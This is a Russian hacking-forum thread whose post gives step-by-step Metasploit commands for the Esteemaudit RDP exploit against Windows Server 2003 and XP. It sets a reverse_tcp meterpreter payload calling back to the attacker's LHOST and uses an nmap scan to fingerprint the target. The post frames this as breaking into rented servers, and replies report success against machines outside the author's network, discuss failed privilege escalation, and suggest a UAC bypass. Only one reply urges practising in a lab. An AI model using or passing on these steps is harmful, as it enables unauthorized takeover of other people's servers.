• Приглашаем на KubanCTF

    Старт соревнований 14 сентября в 10:00 по москве

    Ссылка на регистрацию в соревнованиях Kuban CTF: kubanctf.ru

    Кодебай является технологическим партнером мероприятия

Статья Взлом RDP windows 2017

Приветствую всех, отважился я на такой поступок как по балывать паблик)) (пабликом) по делится с Вами новым приёмом хека дедика, а именно: Windows Server 2003 SP1,SP2 и Windows XP SP0, SP1, SP3

Для начала нам по требуется скачать експлойт и установить его в Metasploit создав специальную для него папку в каталоге метасплойта: (все команды выполняем находясь в данной папке!)

Код:
mkdir /opt/metasploit-framework/modules/exploits/windows/rdp

затем копируем руби скрипт в эту же папку командой:

Код:
cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/

Для работы скрипта по требуются еще и файлы:

Код:
mkdir /usr/share/esteemaudit

копируем все в созданную нами папку:

Код:
cd files

cp * /usr/share/esteemaudit/

Запускаем Metasploit и настраиваемся на этот експлойт посмотрев его настройки.

Screenshot_15.png


задаем атакуемый RHOST

и нагрузку: set PAYLOAD windows/meterpreter/reverse_tcp

и конечно же наладим обратную связь: set LHOST <свой IP>

и ВАЖНО еще настроить експлойт, задать версию ОС windows для него, предварительно узнав какие версии он поддерживает командой: show TARGETS

а вообще узнать какую ОС мы атакуем можно с помощью сканера NMAP командой:

nmap -sS -sC -sV -O -p3389 <атакуемый_IP>

Screenshot_16.png


и, exploit


Удачи!..) и хех, помните мою доброту!))
 
Последнее редактирование:
I

Inject0r

Почаще балуй нас плюшками) Правда чистую XP SP3 скрипт не берет.
 

Breed

Заблокирован
16.05.2017
194
238
BIT
0
Завтра пощупаю в сетке, если работой не завалят...
 

Lenar

Green Team
13.09.2016
13
5
BIT
0
Покажи хотя бы один пример что тебе удалось взломать один комп?
[doublepost=1503911101,1503909219][/doublepost]всегда вот такая хрень выскакивает при сканировании:

OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2, Linux 4.4, Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device


и как быть дальше?
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Покажи хотя бы один пример что тебе удалось взломать один комп?
ну давай, я ща тебе про свои подвиги все расскажу!
Вы вообще кто? И почему я тебе еще должен что то доказывать и показывать?

направление я дал дальше можете все изучить исходя из кода доработать, апгрейдить и юзать по полной!) Или Вы хотите что бы Вам зеро\дэй подарил?
 
Последнее редактирование:
  • Нравится
Реакции: Cyber Satori и id2746

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
и как быть дальше?

1) Поставить себе на комп вирутальную машину, на нее поставить версии Win от первой Win Xp SP2 до Win 7
2) Пробовать эксплуатировать уязвимость, предварительно подняв и настроив сервер RDP
3) Писать сюда, если что то не получается

На данный момент, когда у Вас еще нет минимальных навыков, лезть с целью похекать чужое крайне необдуманный поступок
 

Lenar

Green Team
13.09.2016
13
5
BIT
0
Все манипуляции делаю на Kali Linux. Основной машиной стоит win7.
Kali и win xp service pack 3 стоят на виртуальной машине wmvare

скажите может Kali должен быть основной машиной?
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Все манипуляции делаю на Kali Linux. Основной машиной стоит win7.
Kali и win xp service pack 3 стоят на виртуальной машине wmvare

скажите может Kali должен быть основной машиной?

Очень хорошо, когда Кали или Пэррот или другой дистр для пентеста стоят основной. Это плюс. Но работать можно ис виртуалками. Если там что то не получается, смотрим настройки сети, в первую очередь меняем NAT на сетевой мост в вируталной машине, что бы все ОС были в одной сети полноценной.
 
  • Нравится
Реакции: recrut, no_name и Lenar

woolf1514

Green Team
06.03.2017
181
191
BIT
2
Сработало даже за пределами локальной сети. Автор, огромное спасибо за такой подгон! Пиши еще!!!
 
  • Нравится
Реакции: Tihon49

yvv4recon

Green Team
23.11.2016
20
7
BIT
0
Спасибо за статью! Жаль только цели, которые надо протестировать имеют не windows XP,а windows 10. o_O
 
F

Foget

да сейчас бы актуально было бы про win 10
 
Д

Дедок

На данный момент, когда у Вас еще нет минимальных навыков, лезть с целью похекать чужое крайне необдуманный поступок
Да х.. с ними, естественный отбор никто не отменял.
[doublepost=1503994137,1503993916][/doublepost]
они ребятки все патчатся каждый день, я думаю если только ZEROday найти или купить...
я поражаюсь наглостью и амбициями ньюфагов и так же толерантности администрации к сабжам.

Чеб не офтопить:
Дополню статью видяшечкой по теме для наглядности..

p.s скоро 1 сентемба, почище форум будет, надеюсь...
 
Последнее редактирование модератором:
L

llein

Launching Esteemaudit...
We are inside, waiting for meterpreter...
Exploit completed, but no session was created.

Почему может быть так? Все точно по инструкции.
Мб у меня должен быть открыт какой-то нестандартный порт?
Сижу со стационара через роутер, Кали основная
Объект со мной не в локалке
[doublepost=1504121608,1504114715][/doublepost]Предыдущий вопрос снимается... Решением ыло запускать это все не через Armitage, а через обычную консоль
Теперь другая проблема
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
 
D

Dmitry88

Теперь другая проблема
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)[/quote]

Попробуй сначала UAC bypass.
 
K

Kirukato

Так этот эксплоит для доменной инфраструктуры. Вне домена не получится проэксплуатировать. Пришлось поднять домен в виртуальной машине чтобы проверить.

Ответ авторов на гитхабе :

the most rapid solution to testing the exploit is to virtualize two machine, a windows server edition from 2003 till 2012r2 to do as domain controller and a windows server 2003 or XP to do as Target. The exploit works only on a domain infrastructure, this is because it needs a CA to validate the certificate inside the logon request for smartcard authentication and it will create the callback needed to trigger the exploit. By default every domain controller applies a GPO that will authorize the machine target to log in with RDP smartcard logon.
 

id2746

Green Team
12.11.2016
435
644
BIT
19
Создавай где хочешь, главное чтобы ты смог его потом найти
[doublepost=1504204317,1504204121][/doublepost]Тоже самое касается и доп.файлов, копируй куда хочешь, тогда в опциях эксплоита надо будет прописать к ним путь
 
  • Нравится
Реакции: IioS
K

Kirukato

Дошли руки чтоб поюзать твою инструкцию, и возник вопрос, а разве не не по этому пути нужно создать /rdp - /ust/share/metasploit-framework/modules/exploits/windows/rdp ?

в usr/share ставь, проще через поиск метасплоита потом искать. Видимо у автора рабочая папка metasploit в /opt/
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!